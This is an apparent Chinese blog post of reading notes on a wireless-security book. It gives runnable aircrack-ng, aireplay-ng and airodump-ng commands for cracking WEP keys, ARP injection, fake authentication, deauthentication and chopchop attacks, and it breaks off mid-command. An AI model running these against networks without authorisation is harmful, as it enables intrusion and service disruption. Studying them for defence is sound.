《无线网络安全攻防实战》读书笔记

本文详细介绍了从基本的WEP破解步骤,如设置监听模式、抓取数据包、利用arp注入攻击,到高级技术如WPA破解、GPU加速、无线欺骗和DOS攻击防范。同时涵盖了无线网络安全工具如aircrack-ng、aireplay-ng、以及防范措施如mac地址过滤和VPNs的破解与保护。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

虽然无线破解早就烂大街了,还是去图书馆把这本书补上了,做个笔记,以供以后参考,记得很全面但很乱。测试环境为Kali linux 或backtrack

wep破解

1.将网卡激活成monitor模式

    airmon-ng start wlan0 6
    
2.开始抓取无线数据包:

    airodump-ng -w ciw.cap --channel 6 mon0
    
3.为了加快IV(初始化向量)的获取,可以进行ArpRequest注入式攻击,可以有效提高抓包数量及破解速度:

    aireplay-ng -3 -b AP's MAC -h Client's MAC -x 1024 wlan0    

    参数解释:

    * -3,指的是采取ArpRequest注入攻击方式;
    * -b,后面跟上要入侵的AP的MAC地址;
    * -h,建议使用,效果会更好,后面跟的是监测到的客户端MAC地址;
    * -x num,指的是定义每秒发送数据包数量,这个num值可以根据实际情况调小一些,但一般来说最高1024就可以

4.开启aircrack-ng来进行同步破解:

    aircrack-ng -x -f 2 ciw.cap

    参数解释:
    * -x,是暴力破解模式;
    * -f,指启用密码复杂度为2;
    
    
1.启动无线网卡的监听模式
$ sudo airmon-ng start wlan0


2.  查看有哪些采用wep加密的路由器,记录目标ap的mac
$ sudo airodump-ng mon0


3. 另开一个终端,运行
$ sudo airodump-ng -c 6 --bssid AP’s MAC -w wep mon0
其中6是AP的信道(channel),AP’sMAC是路由器的MAC地址,wep的是抓下来的数据包保存的文件名


4. 再另开一个终端,与AP建立虚拟连接
$ sudo aireplay-ng -1 0 -a AP’s MAC -h My-MAC mon0


5. 建立虚拟连接成功后,运行下面命令,加速数据获取
$ sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My-MAC mon0

6. 收集5000个以上的DATA之后,开始进行解密 。另开一个终端,运行
$ sudo aircrack-ng wep*.cap
如果暂时没算出来的话,继续等,aircrack-ng 会在DATA每增加5000个之后自动再次运行,直到算出密码为止


7. 破解成功后,关闭监控模式
$ sudo airmon-ng stop mon0


自动攻击工具:wep spoonfeeder

Deauth验证攻击,这个对于采用WPA验证的AP攻击都会用到,可以迫使AP重新与客户端进行握手验证,从而使得截获成为可能。命令如下
aireplay-ng  -0  10  -a   AP's MAC   mon0
或者
aireplay-ng  -0  10  -a   AP's MAC   -h  Client's MAC   mon0
    -0指的是采取Deautenticate攻击方式,后面为发送次数,-a后面跟上要入侵的AP的MAC地址,-h建议还是使用,效果会更好,这个后面跟的是监测到的客户端MAC地址


wep破解的多米诺骨牌

1.无客户端chopchop攻击
     1.airodump-ng --ivs -c 6 -w file mon0     捕获数据
     2.aireplay-ng -l  0  -e AP'ESSID -a AP'MAC -h CLIENT'MAC mon0
        FakeAuth:与ap建立虚拟的验证连接,以便之后注入数据包
        -h 用于攻击的网卡mac
     3.aireplay-ng -4 -b AP'MAC -h CLIENT'MAC mon0
        -4 chopchop攻击,生成密钥数据流文件  -h 攻击者自己的mac
        生成明文后缀为cap和密钥数据流后缀xor文件
     4.tcpdump  -s  0  -n  -e  -r  replay_dec.cap
        -s 从每个报文截取snaplen字节的数据
        -n 不进行ip地址到主机名的转换
        -e 在输出行打印数据链路层头部信息
        -r 从文件读取包
     5.packetforge-ng -0 -a AP'MAC -h CLIENT'

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值